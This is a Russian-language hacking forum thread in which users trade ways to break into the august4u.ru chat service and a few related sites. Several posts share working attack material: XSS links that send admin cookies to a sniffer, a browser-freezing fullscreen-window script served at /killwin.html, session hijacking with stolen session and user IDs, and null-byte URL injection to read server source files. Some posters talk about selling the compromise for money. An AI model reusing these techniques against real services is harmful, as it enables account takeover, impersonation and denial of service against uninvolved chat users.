|
А где конкретно написано, или дай что писал ты. я нашёл где Algol писал о том как inetcrack'ом флудить, но не получается.
|
ну ламонется!!!
все что создона человеком тоже им и будет взломано))
вот такая вот тема я нашол ну или ктото еще http://blackcamel.ru/people/?id=<> вот можно ченить или дефйс или ченить смостерить в место <> чкрипт написать!!! ну должноже както ламонуться!!!!! август ломанут !!!!!! я уверен тока не сейчас ну ломанут!!!! и тогда будет круто!!! ;) а вобще врядли!!! это все надо между некоторыми хакерами "!!! без ламеров!!! так как на августинских чатах можно хорошо заработать!!!! там много люде кто заплатить да еще и как) ;) ну смотрите сами тока незакрывайте эту тему !!!! август толжен сломиться!!!! |
так как всётаки взломать чат?
|
Цитата:
Авось на такой дефейс кто нибудь купиться =)) |
|
Цитата:
Все равно я нашел =)) :cool: :cool: :cool: |
А вот продолжение...СЮДА
|
Или вот...Go
|
А вот к снифферу... Хотя ничего не отсылается... ((
Перейти... |
Хотя всетаки отсылается Ip адрес, но думаю много он не даст... Для обшего развития пойдет...
|
оп идее, если ссылку со скриптом, отправляющим куки на снифак подослать админу, его куки должны слиться... тока лучше ему незаметно впарить
|
должно получится :)
|
вот и попробуйте, у кого время есть
|
Нихрена не получиться! Попробуйте сначала зарегиться, потом авторизовавшись перейти по этой ссылке!
|
Хех. Толи отсюда стучат, толи админ тут лазит. Прикрыли прошлую XSS.
Вот еще две: Цитата:
Цитата:
|
поидее если будет доступ в админке к тегам чата или новостной ленты то можно побаловаца...
(З.Ы. как Антошка2003 в правилах чата) есть в киле небольшое но! - можно забанить чела на более больший срок, подставив свои значения... сёння это я писал тут http://forum.antichat.ru/showthread.php?t=4888 до того как заметил эту тему... забыл сказать если неошибаюсь.. ес в киле поменять значение name=id value=73aa8dc48351d9fb на чужое то можно кинуть от чужого ника.... вот научица бы ещё поднимать свои привелегии в чате..... |
Ахренеть! Оперативно. Уже пофиксили. Ну ничего... еще есть в неожиданных местах.
|
да я это уже давно продумал.... главное поднятие привелегий....
и есчо в страничке чата /killwin.html скрипт <body scroll=no bgcolor=black><script>setInterval ("focus ()", 10); w = open ('','','fullscreen=1'); w.document.write ('<body scroll=no bgcolor=black>' + document.body.innerHTML + '</body>')</script></body> вот защитица бы от такова бана бы.... |
Поставь себе Файервол. Если резать не будет - сам кусок пропиши, что он вырезать будет.
|
Цитата:
так как она защищает? |
forever777, я всмысле - када чела килл или админ когда кидают из чата с зависанием компа то открываеца страничка к примеру: http://august4u.ru/killwin.html и твой комп висит от этой шняги...
******** censored!, попробую.. думаю прога AdMunch тож подойдёт.. ******** http://demo.august4u.ru http://demo.august4u.ru/admin/?? Login: demo Pass: demo Демо админки августа (тама всё только для чтения стоит:( ...) |
Была дыра по сеиссии из админки demo, в админку заходишь, подставляешь свои значения. Но эту дыру вроде перекрыли чтоли. Сам не пробовал правда.
|
помните недавний конкурс от xakep.ru на падонке... тама была новосная лента - ждём баблос и т.д. в верху писалось число, месяц, год, эра. к примеру 25.04.05.n в строке браузера выглядело
....php?day=25&month=04&year=05&era=n подставив следующее: http://padonak.ru/cgi-bin/about/news...dex&era=php%00 http://padonak.ru/cgi-bin/about/news...aram&era=pl%00 http://padonak.ru/cgi-bin/about/news...ews&era=php%00 можно было почитать index.php, param.pl, news.php. :) в анкетах августа привыдаче ошибочного сообщения - "ник незарегестрирован" вначале пишется ">>" пример: http://august4u.ru/people/?id=&result=info&nick= может тут можно чтолибо подковырнуть???? :confused: |
Цитата:
|
Цитата:
|
все в видео много раз ломали через страку браузера мне кажется и щас у вас получится
|
в августе есть возможность разговора от чужого имени (возможно юзание админки и т.д.) через сесию.....
узнаю чужую сессию и чужой id: (sess=1744f6b611019d6eb93aeccb05aaf934 id=12715728695d764c id2=3252) потом через LocationReplace вставляю значения к примеру в http://www.august4u.ru/mess.php?sess...d764c&id2=3252. вот и всё... работает пока на другом конце не выйдут из чата... |
так а как узнать эту сесию?
|
Цитата:
доступ к общим HTML тэгам доступ к стилям в HTML тэгах индивидуальные HTML тэги и в админке разрешён тег img) а вот id пришлось спросить. думаю проще будет самому зайти в чат под 2-мя никами и поэксперементировать... |
жаль что немогу проэкспереминтировать чат тупит у августина как всегда)
|
кстати вот еще какойто файл http://erodrom.august4u.ru/admin/admin
|
и всетаки как узнать id ? мне кажется невозможно!!!
|
Цитата:
Я сегодня всю ночь думал как и коечто надумал... И уже протестил! всё работает!... :D Возможно сегодня запишу видео... ;) (зависит от напряги с работой) |
мне кажется нестоит тока видео записывать пока ну можно канечно ну ты можешь реально заработать денег за это все щас много кто за то чтоб сервис взломали заплатят нармальные деньги!! мне лично придлогали за 1000 ну я еще пока не ломал!!
|
Цитата:
Цитата:
Цитата:
|
строка привата:
http://www.august4u.ru/private?sess=...206102&id2=258 отсылаем фразу c картинкой (нужен доступ к HTML): http://antichat.ru/cgi-bin/s.jpg получаем id собеседника, а затем используем IE_XSS_Kit, вот и всё. |
ладно пусть канечно запишет видео!! непомишает да и вобще надо понять рейтинг августина))) а то он там оборзел был такой случай так он сцука оборзел не в чем не уступает взвысел себя в короли!!!! давайте покажите ему как надо))))
если запишешь видео то отправь его мне лии kez чтоб он его опублековал!!!! а горили что августина не уязвим!!!! все уезвимо прото мозги надо!!! и опыт!!! |
Цитата:
если ты не будешь записывать видео то скажи как ты узнал строку привата!!! :confused: |
Думаю тут точно админ августа шастает... даже незнаю как его нехорошо и назвать... теперь строка привата выглядит вот так:(
http://www.august4u.ru/private?id2=2312&private=1 а видео есть и то очень сырое... и то я в нём id узнал спросив.... даже нет смысла его размещать:( а строку привата несложно узнать :) в эксплорере есть волшебная кнопочка, F11 называеца, думаю ты на клавиатуре её найдёш...:) |
Угук. Шастает. Сколько Xss вывешивал - прикрывает. Теперь не вывешиваю =)
|
| Время: 19:37 |